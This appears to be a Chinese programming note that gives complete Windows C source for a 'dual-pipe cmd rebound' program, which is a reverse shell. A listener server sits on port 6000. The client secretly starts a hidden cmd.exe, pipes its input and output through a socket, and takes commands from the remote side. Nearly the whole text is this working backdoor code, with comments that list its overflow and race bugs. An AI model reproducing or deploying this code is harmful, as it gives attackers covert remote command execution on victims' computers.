双管道cmd反弹程序

仅此记录,以备查询

server:


#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")


/*
 * Server side: reader thread for one accepted connection.
 * Loops on recv() and prints whatever arrives on stdout; when recv()
 * reports a closed or failed socket it closes the handle and ends the thread.
 * lPvoid carries the SOCKET value cast to a pointer (see SocketThread).
 *
 * Defect: receiveBuf[len] = 0 below writes one byte past the end when
 * recv() fills all 1024 bytes; no room is reserved for the terminator.
 * Defect: closesocket() here races with SendThread, which still uses the
 * same socket value after this thread has closed it.
 */
void ReceiveThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	while(1)
	{
		char receiveBuf[1024];// receive buffer
		int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
		if(len <= 0)
		{
			// 0 = peer closed, SOCKET_ERROR = failure; either way this thread stops
			closesocket(socketNew);
			printf("socket error...\n");
			ExitThread(0);
		}
		receiveBuf[len] = 0;// NUL-terminate so printf("%s") can consume it; output stops at any embedded NUL
		printf("%s",receiveBuf);
	}
}

/*
 * Server side: writer thread for one accepted connection.
 * Reads one line at a time from the console and send()s it (without the
 * terminator) on the socket; exits the thread when send() fails.
 * lPvoid carries the SOCKET value cast to a pointer (see SocketThread).
 *
 * Defect: gets() has no bound, so console input longer than 1023 bytes
 * overflows sendBuf (gets() was removed from the language in C11).
 * Note: `test` is assigned but never used.
 */
void SendThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;

	char test[] = "dir d:\\";
	char sendBuf[1024];
	
	while(1)
	{
		gets(sendBuf);        
		//printf("Send:%s\n",sendBuf);
		if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
		{
			printf("Send Error\n");
			// After the first socket has been closed this thread has not exited yet,
			// so anything typed at that point has no effect.
			// This is only a test; normally each connection would get its own cmd window.
			ExitThread(0);
		}
	}

}


/*
 * Server side: per-connection dispatcher.
 * Starts a ReceiveThread and a SendThread that share the same socket value
 * and returns immediately; the socket is then owned by those two threads.
 * The second _beginthread argument (NULL, i.e. 0) selects the default stack size.
 *
 * Note: nothing joins or tracks the two threads, and ReceiveThread closes
 * the socket on its own while SendThread may still be using it.
 */
void SocketThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	_beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
	_beginthread(SendThread, NULL, (LPVOID)socketNew);

}

/*
 * Server entry point: initialises Winsock 2.2, listens on TCP port 6000 on
 * all interfaces, and hands every accepted connection to SocketThread.
 * argc/argv are not used. The `return 1` after the loop is unreachable.
 *
 * Defects: the results of socket(), bind(), listen() and accept() are never
 * checked, so a failed accept() (INVALID_SOCKET) is still passed to a new
 * thread; the listening socket is never closed and WSACleanup() is never called.
 */
int main(int argc,char **argv)
{
	// initialise Winsock
	WORD myVersionRequest;
	WSADATA wsaData;
	myVersionRequest=MAKEWORD(2,2);
	int err;
	err=WSAStartup(myVersionRequest,&wsaData);
	if (!err){
		printf("已打开套接字\n");
	}else{
		printf("ERROR:嵌套字未打开!");
		return 1;
	}
	// create the listening socket
	SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);// return value not checked

	// address to bind; sin_zero is left uninitialised
	SOCKADDR_IN addr;
	addr.sin_family=AF_INET;
	addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);// any local address
	addr.sin_port=htons(6000);// hard-coded listening port

	bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));// return value not checked
	listen(serSocket,5);// second argument is the pending-connection backlog

	//
	// accept loop
	//
	SOCKADDR_IN clientsocket;
	int len=sizeof(SOCKADDR);// accept() updates this in place; it is never reset between iterations

	while(1)
	{
		SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
		printf("new connection is coming....\n");
		_beginthread(SocketThread, NULL, (LPVOID)socketNew);
	}
	return 1;
}

client:

#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")

// Client side: process-wide state shared between main() and the reader thread.
// hStdInRead/hStdInWrite: pipe feeding the child's stdin (child reads, parent writes).
HANDLE hStdInRead, hStdInWrite;
// hStdOutRead/hStdOutWrite: pipe carrying the child's stdout+stderr (child writes, parent reads).
HANDLE hStdOutRead, hStdOutWrite;

// Pipe handle attributes; both are set inheritable in CreateTwoPipe().
SECURITY_ATTRIBUTES saIn, saOut;

// The single TCP connection; written by main(), read by ReadOutPutReadCmd().
SOCKET clientSocket;



/*
 * Client side: creates two anonymous pipes and launches a hidden cmd.exe whose
 * stdin is the read end of the first pipe and whose stdout and stderr are both
 * the write end of the second pipe.
 * Returns FALSE only when CreatePipe() fails; returns TRUE otherwise.
 *
 * Defects visible here:
 *  - CreateProcess()'s result is stored in dwRet but never tested, so TRUE is
 *    returned even when no process was started.
 *  - ProcessInformation.hProcess/hThread are never closed.
 *  - The parent keeps its copies of the child's ends (hStdInRead, hStdOutWrite),
 *    so a ReadFile() on hStdOutRead cannot observe EOF when cmd exits.
 *  - The second error message says "in pipe" although it reports the out pipe.
 */
BOOL CreateTwoPipe()
{
	DWORD dwRet;
	saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
	saIn.bInheritHandle = TRUE;// both ends inheritable; CreateProcess below inherits all inheritable handles
	saIn.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
	saOut.bInheritHandle = TRUE;
	saOut.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow=SW_HIDE; 
	si.hStdInput = hStdInRead;
	si.hStdOutput = hStdOutWrite;
	si.hStdError = hStdOutWrite;// stderr shares the stdout pipe
	char cmdline[]="cmd.exe";// writable buffer: CreateProcess may modify lpCommandLine
	PROCESS_INFORMATION ProcessInformation; 
	dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); // bInheritHandles = 1; result ignored

	return TRUE;

}

/*
 * Client side: thread that forwards the child's stdout/stderr pipe to the socket.
 * Polls hStdOutRead with PeekNamedPipe(); whenever bytes are reported it reads
 * them with ReadFile() and send()s them on clientSocket. Leaves the loop when
 * ReadFile() fails or send() returns <= 0, then simply returns.
 * lPvoid is unused.
 *
 * Notes: the loop never waits, so it spins at full CPU while the pipe is empty.
 * PeekNamedPipe()'s return value is not checked, so on failure dwByteRecv keeps
 * its previous value. The fourth argument is lpBytesRead, which is bounded by
 * the 1024-byte buffer size, so the following ReadFile() stays within Buf.
 * Exiting this thread does not notify main(), which keeps reading the socket.
 */
void ReadOutPutReadCmd(LPVOID lPvoid)
{
	DWORD dwByteRecv;
	char Buf[1024] = {0};
	int ret;

	while(1)
	{
		memset(Buf, 0, sizeof(Buf));
		PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);// copies data into Buf without consuming it
		if(dwByteRecv)
		{
			ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);// now consume the same bytes
			if(!ret)
				break;
			ret = send(clientSocket, Buf, dwByteRecv, 0);
			if(ret <= 0)
				break;
		}
	}

}


/*
 * Client entry point: initialises Winsock 2.2, connects to 127.0.0.1:6000,
 * calls CreateTwoPipe() to start the child, spawns ReadOutPutReadCmd() for
 * the pipe-to-socket direction, and in this thread copies each recv()'d chunk,
 * followed by "\r\n", into the child's stdin pipe.
 * argc/argv are not used.
 *
 * Defects visible here:
 *  - recv() returns int but is stored in the unsigned dwByteRecv; SOCKET_ERROR
 *    (-1) becomes 0xFFFFFFFF, `dwByteRecv <= 0` is then false, and the
 *    following Buf[dwByteRecv] indexes far outside Buf.
 *  - Even on success, a 1024-byte recv() makes Buf[1024..1026] writes, three
 *    bytes past the end of the 1024-byte buffer.
 *  - socket() is not checked; failure paths return 0 while WSAStartup failure
 *    returns 1, so the exit status is inconsistent.
 *  - Pipe handles and the child process are never closed or terminated on exit.
 */
int main(int argc,char **argv)
{
	int err;
	WORD versionRequired;
	WSADATA wsaData;
	versionRequired=MAKEWORD(2,2);
	err=WSAStartup(versionRequired,&wsaData);// requested Winsock version
	if (!err)    {
		printf("客户端嵌套字已经打开!\n");
	}else{
		printf("ERROR:客户端的嵌套字打开失败!\n");
		return 1;// exit
	}
	clientSocket=socket(AF_INET,SOCK_STREAM,0);// return value not checked

	// hard-coded peer address; sin_zero is left uninitialised
	SOCKADDR_IN clientsock_in;
	clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
	clientsock_in.sin_family=AF_INET;
	clientsock_in.sin_port=htons(6000);

	//bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));// note the third argument
	//listen(clientSocket,5);
	int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));// connect
	if(ret != 0)
	{
		printf("failed to connect to server...\n");
		return 0;
	}

	if(!CreateTwoPipe())
	{
		printf("failed to create pipe...\n");
		return 0;
	}

	DWORD dwByteRecv;
	char Buf[1024] = {0};

	_beginthread(ReadOutPutReadCmd, 0, NULL);

	// socket -> child stdin loop; ends when recv() returns 0 or WriteFile() fails
	while(1)
	{
		//memset(Buf, 0, sizeof(Buf));
		//Sleep(1000);   // wait for cmd to execute
		//PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
		//if(dwByteRecv)
		//{
		//	ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
		//	if(!ret)
		//		break;
		//	ret = send(clientSocket, Buf, dwByteRecv, 0);
		//	if(ret <= 0)
		//		break;
		//}
		//else
		//{
		//	dwByteRecv = recv(clientSocket, Buf, 1024, 0);

		//	if(dwByteRecv <= 0)
		//		break;	
		//	Buf[dwByteRecv] = '\r';
		//	Buf[dwByteRecv+1] = '\n';
		//	Buf[dwByteRecv + 2] = 0;
		//	printf("recv: %s", Buf);
		//	ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
		//	if(!ret)
		//		break;

		//}

		dwByteRecv = recv(clientSocket, Buf, 1024, 0);// int result stored in a DWORD

		if(dwByteRecv <= 0)// unsigned compare: only catches 0, not SOCKET_ERROR
			break;	
		Buf[dwByteRecv] = '\r';// appends CRLF so cmd treats the chunk as one line; out of bounds when dwByteRecv == 1024
		Buf[dwByteRecv+1] = '\n';
		Buf[dwByteRecv + 2] = 0;
		printf("recv: %s", Buf);
		ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);// dwByteRecv now holds bytes written
		if(!ret)
			break;
	}
	closesocket(clientSocket);
	WSACleanup();
	system("pause");// keeps the console open; not part of the protocol
	return 0;
}


